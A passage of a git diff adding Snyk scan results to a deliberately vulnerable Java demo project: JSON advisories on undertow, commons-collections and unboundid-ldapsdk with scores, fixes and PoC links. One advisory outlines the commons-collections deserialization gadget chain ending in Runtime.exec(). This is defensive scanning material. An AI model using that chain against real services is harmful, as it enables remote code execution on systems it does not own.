+ "modificationTime": "2024-08-24T01:12:26.277956Z"
+ }
+ ],
+ "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Race Condition due to the reuse of the `StringBuilder` instance in the `ProxyProtocolReadListener` across multiple requests. An attacker can access data from previous requests or responses by exploiting the shared usage of the `StringBuilder`.\r\n\r\nThis vulnerability primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2305290)\n",
+ "epssDetails": {
+ "percentile": "0.21908",
+ "probability": "0.00053",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2024-7885"
+ ],
+ "CWE": [
+ "CWE-362"
+ ]
+ },
+ "packageName": "io.undertow:undertow-core",
+ "proprietary": false,
+ "creationTime": "2024-08-18T13:26:45.492443Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2024-08-07T00:00:00Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "io.undertow",
+ "artifactId": "undertow-core"
+ },
+ "publicationTime": "2024-08-18T13:44:23.906447Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-08-24T01:12:26.277956Z",
+ "socialTrendAlert": false,
+ "packagePopularityRank": 99,
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "io.undertow:undertow-core@2.3.14.Final"
+ ],
+ "upgradePath": [],
+ "isUpgradable": false,
+ "isPatchable": false,
+ "isPinnable": false,
+ "isRuntime": false,
+ "name": "io.undertow:undertow-core",
+ "version": "2.3.14.Final",
+ "severityWithCritical": "medium"
+ }
+ ],
+ "upgrade": {
+ "com.unboundid:unboundid-ldapsdk@3.1.1": {
+ "upgradeTo": "com.unboundid:unboundid-ldapsdk@4.0.5",
+ "upgrades": [
+ "com.unboundid:unboundid-ldapsdk@3.1.1"
+ ],
+ "vulns": [
+ "SNYK-JAVA-COMUNBOUNDID-32143"
+ ]
+ },
+ "commons-collections:commons-collections@3.1": {
+ "upgradeTo": "commons-collections:commons-collections@3.2.2",
+ "upgrades": [
+ "commons-collections:commons-collections@3.1",
+ "commons-collections:commons-collections@3.1",
+ "commons-collections:commons-collections@3.1"
+ ],
+ "vulns": [
+ "SNYK-JAVA-COMMONSCOLLECTIONS-30078",
+ "SNYK-JAVA-COMMONSCOLLECTIONS-472711",
+ "SNYK-JAVA-COMMONSCOLLECTIONS-6056408"
+ ]
+ },
+ "org.apache.logging.log4j:log4j-core@2.15.0": {
+ "upgradeTo": "org.apache.logging.log4j:log4j-core@2.17.1",
+ "upgrades": [
+ "org.apache.logging.log4j:log4j-core@2.15.0",
+ "org.apache.logging.log4j:log4j-core@2.15.0",
+ "org.apache.logging.log4j:log4j-core@2.15.0"
+ ],
+ "vulns": [
+ "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339",
+ "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524",
+ "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014"
+ ]
+ }
+ },
+ "patch": {},
+ "ignore": {},
+ "pin": {}
+ },
+ "filesystemPolicy": false,
+ "filtered": {
+ "ignore": [],
+ "patch": []
+ },
+ "uniqueCount": 9,
+ "projectName": "io.snyk:log4shell-server",
+ "displayTargetFile": "pom.xml",
+ "hasUnknownVersions": false,
+ "path": "/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server"
+}
diff --git a/log4shell-goof/log4shell-server/result22.json b/log4shell-goof/log4shell-server/result22.json
new file mode 100644
index 0000000000..037aece4a3
--- /dev/null
+++ b/log4shell-goof/log4shell-server/result22.json
@@ -0,0 +1,1778 @@
+{
+ "vulnerabilities": [
+ {
+ "id": "SNYK-JAVA-COMMONSCOLLECTIONS-30078",
+ "title": "Deserialization of Untrusted Data",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[3.0,3.2.2)"
+ ]
+ },
+ "exploit": "High",
+ "fixedIn": [
+ "3.2.2"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "critical",
+ "cvssScore": 9.8,
+ "functions": [
+ {
+ "version": [
+ "[3,3.2.2)"
+ ],
+ "functionId": {
+ "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java",
+ "className": "InvokerTransformer",
+ "functionName": "transform"
+ }
+ }
+ ],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "commons-collections:commons-collections",
+ "references": [
+ {
+ "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/",
+ "title": "FoxGloveSecurity Blog"
+ },
+ {
+ "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580",
+ "title": "Jira Issue"
+ },
+ {
+ "url": "https://github.com/ianxtianxt/CVE-2015-7501",
+ "title": "PoC"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "critical",
+ "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 9.8,
+ "modificationTime": "2024-03-11T09:46:27.924934Z"
+ },
+ {
+ "assigner": "Red Hat",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
+ "cvssV3BaseScore": 7.3,
+ "modificationTime": "2024-03-11T09:52:38.421377Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "assigner": "Snyk",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:09:40.078866Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.0",
+ "modificationTime": "2024-03-11T09:46:27.924934Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
+ "assigner": "Red Hat",
+ "severity": "high",
+ "baseScore": 7.3,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:52:38.421377Z"
+ }
+ ],
+ "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n",
+ "epssDetails": {
+ "percentile": "0.88578",
+ "probability": "0.01844",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2015-7501"
+ ],
+ "CWE": [
+ "CWE-502"
+ ]
+ },
+ "packageName": "commons-collections:commons-collections",
+ "proprietary": false,
+ "creationTime": "2016-12-25T16:51:56Z",
+ "functions_new": [
+ {
+ "version": [
+ "[3,3.2.2)"
+ ],
+ "functionId": {
+ "className": "org.apache.commons.collections.functors.InvokerTransformer",
+ "functionName": "transform"
+ }
+ }
+ ],
+ "alternativeIds": [],
+ "disclosureTime": "2015-11-06T16:51:56Z",
+ "exploitDetails": {
+ "sources": [
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "High",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Proof of Concept",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "commons-collections",
+ "artifactId": "commons-collections"
+ },
+ "publicationTime": "2015-11-06T16:51:56Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-03-11T09:52:38.421377Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "critical",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "commons-collections:commons-collections@3.1"
+ ],
+ "upgradePath": [
+ false,
+ "commons-collections:commons-collections@3.2.2"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "commons-collections:commons-collections",
+ "version": "3.1"
+ },
+ {
+ "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711",
+ "title": "Deserialization of Untrusted Data",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[,3.2.2)"
+ ]
+ },
+ "exploit": "Proof of Concept",
+ "fixedIn": [
+ "3.2.2"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "medium",
+ "cvssScore": 5.6,
+ "functions": [
+ {
+ "version": [
+ "[3.1, 3.22)",
+ "[,3.0-dev2)"
+ ],
+ "functionId": {
+ "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java",
+ "className": "InvokerTransformer",
+ "functionName": ""
+ }
+ }
+ ],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "commons-collections:commons-collections",
+ "references": [
+ {
+ "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://github.com/apache/commons-collections/pull/18",
+ "title": "GitHub PR"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580",
+ "title": "Jira Ticket"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
+ "cvssV3BaseScore": 7.3,
+ "modificationTime": "2024-03-11T09:52:35.761152Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 5.6,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:03:34.698666Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
+ "assigner": "NVD",
+ "severity": "high",
+ "baseScore": 7.3,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:52:35.761152Z"
+ }
+ ],
+ "description": "## Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent 
through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. 
So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n",
+ "epssDetails": {
+ "percentile": "0.82742",
+ "probability": "0.00880",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2015-6420"
+ ],
+ "CWE": [
+ "CWE-502"
+ ],
+ "GHSA": [
+ "GHSA-6hgm-866r-3cjv"
+ ]
+ },
+ "packageName": "commons-collections:commons-collections",
+ "proprietary": false,
+ "creationTime": "2019-10-10T18:31:03.943542Z",
+ "functions_new": [
+ {
+ "version": [
+ "[3.1, 3.22)",
+ "[,3.0-dev2)"
+ ],
+ "functionId": {
+ "className": "org.apache.commons.collections.functors.InvokerTransformer",
+ "functionName": ""
+ }
+ }
+ ],
+ "alternativeIds": [],
+ "disclosureTime": "2019-10-10T00:00:00Z",
+ "exploitDetails": {
+ "sources": [
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Proof of Concept",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Proof of Concept",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "commons-collections",
+ "artifactId": "commons-collections"
+ },
+ "publicationTime": "2020-02-24T00:00:00Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-03-11T09:52:35.761152Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "medium",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "commons-collections:commons-collections@3.1"
+ ],
+ "upgradePath": [
+ false,
+ "commons-collections:commons-collections@3.2.2"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "commons-collections:commons-collections",
+ "version": "3.1"
+ },
+ {
+ "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408",
+ "title": "Deserialization of Untrusted Data",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[3.0,3.2.2)"
+ ]
+ },
+ "exploit": "High",
+ "fixedIn": [
+ "3.2.2"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "critical",
+ "cvssScore": 9.8,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "commons-collections:commons-collections",
+ "references": [
+ {
+ "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/",
+ "title": "FoxGloveSecurity Blog"
+ },
+ {
+ "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580",
+ "title": "Jira Issue"
+ },
+ {
+ "url": "https://github.com/ianxtianxt/CVE-2015-7501",
+ "title": "PoC"
+ },
+ {
+ "url": "https://www.exploit-db.com/exploits/46628",
+ "title": "Exploit DB"
+ },
+ {
+ "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
+ "title": "CISA - Known Exploited Vulnerabilities"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "critical",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 9.8,
+ "modificationTime": "2024-03-11T09:54:13.273677Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "assigner": "Snyk",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:09:40.088365Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:54:13.273677Z"
+ }
+ ],
+ "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n",
+ "epssDetails": {
+ "percentile": "0.99697",
+ "probability": "0.96729",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2015-4852"
+ ],
+ "CWE": [
+ "CWE-502"
+ ]
+ },
+ "packageName": "commons-collections:commons-collections",
+ "proprietary": false,
+ "creationTime": "2023-11-14T13:41:26.946764Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2015-11-06T16:51:56Z",
+ "exploitDetails": {
+ "sources": [
+ "CISA",
+ "ExploitDB",
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "High",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Attacked",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "commons-collections",
+ "artifactId": "commons-collections"
+ },
+ "publicationTime": "2015-11-06T16:51:56Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-06-03T08:53:26.834525Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "critical",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "commons-collections:commons-collections@3.1"
+ ],
+ "upgradePath": [
+ false,
+ "commons-collections:commons-collections@3.2.2"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "commons-collections:commons-collections",
+ "version": "3.1"
+ },
+ {
+ "id": "SNYK-JAVA-COMUNBOUNDID-32143",
+ "title": "User Impersonation",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[,4.0.5)"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [
+ "4.0.5"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "critical",
+ "cvssScore": 9.8,
+ "functions": [
+ {
+ "version": [
+ "[,4.0.5)"
+ ],
+ "functionId": {
+ "filePath": "com/unboundid/ldap/sdk/SimpleBindRequest.java",
+ "className": "SimpleBindRequest",
+ "functionName": "process"
+ }
+ }
+ ],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "com.unboundid:unboundid-ldapsdk",
+ "references": [
+ {
+ "url": "https://github.com/pingidentity/ldapsdk/commit/8471904a02438c03965d21367890276bc25fa5a6",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000134",
+ "title": "NVD"
+ },
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1557531",
+ "title": "RedHat Bugzilla Bug"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "critical",
+ "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 9.8,
+ "modificationTime": "2024-03-11T09:47:19.854962Z"
+ },
+ {
+ "assigner": "Red Hat",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 7,
+ "modificationTime": "2024-03-11T09:49:40.956024Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "Snyk",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:02:05.592817Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.0",
+ "modificationTime": "2024-03-11T09:47:19.854962Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
